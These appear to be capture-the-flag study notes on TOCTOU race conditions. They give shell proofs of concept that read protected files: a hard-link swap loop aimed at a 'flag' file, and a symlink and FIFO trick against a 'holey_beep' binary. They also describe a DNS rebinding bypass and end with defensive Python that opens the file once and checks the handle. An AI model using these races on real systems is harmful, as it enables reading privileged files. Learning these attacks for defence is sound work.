Time of Check Time of Use

ReadLink TOCTOU PoC:

    cd /home/user
    cp /bin/cat 'asdf (deleted)'
    # Start loop
    while true; do ln /home/poetry/poerty ./asdf; (./asdf ../poetry/flag &); rm asdf; done

DNS

An application looks up the IP of a DNS name to test whether it is on an exclusion list, then makes a request to the domain. Because the request triggers a second DNS lookup, the name can resolve to a different IP, one that is on the exclusion list.

Linux

Using a pipe to create a wait state in an executable.

PoC:

    cd /tmp
    mkdir dev
    ln -s /secret_cake_recipe /tmp/dev/console
    mkfifo /tmp/xyz
    /home/user/holey_beep $(seq 1 1 5000) 2> /tmp/xyz &
    (sleep 30; cat - ) < /tmp/xyz &
    pgrep holey_beep | head -c 100
    kill -15 12

Fixes

Open the file as a file handle and catch any errors.
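
One way to apply this fix, shown beside the check-then-use pattern it replaces. This is an added example, not code from the original page; the function names and the temporary files are constructed for illustration. It assumes a Linux/POSIX system, and `O_NOFOLLOW` only covers the final path component.

```python
import errno
import os
import stat
import tempfile


def read_racy(path):
    """Check, then use: two separate path lookups with a window between them."""
    if os.path.islink(path) or not os.path.isfile(path):  # time of check
        return None, "rejected"
    with open(path, "rb") as f:  # time of use: the path may now name something else
        return f.read(), None


def read_checked(path, max_bytes=4096):
    """Open once, catch errors, then run every check on the handle itself."""
    try:
        # O_NOFOLLOW: refuse a symlink in the final path component (ELOOP).
        # O_NONBLOCK: do not stall in open() if the path is a FIFO.
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK)
    except OSError as exc:
        return None, "open failed: " + errno.errorcode.get(exc.errno, "?")
    try:
        st = os.fstat(fd)  # describes the object we hold, not the path
        if not stat.S_ISREG(st.st_mode):
            return None, "not a regular file"
        return os.read(fd, max_bytes), None
    finally:
        os.close(fd)


def demo():
    """Constructed inputs: a regular file, a symlink to it, a FIFO, a missing path."""
    with tempfile.TemporaryDirectory() as d:
        paths = {n: os.path.join(d, n) for n in ("real", "link", "fifo", "missing")}
        with open(paths["real"], "wb") as f:
            f.write(b"data")
        os.symlink(paths["real"], paths["link"])
        os.mkfifo(paths["fifo"])
        return {n: read_checked(p) for n, p in paths.items()}


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```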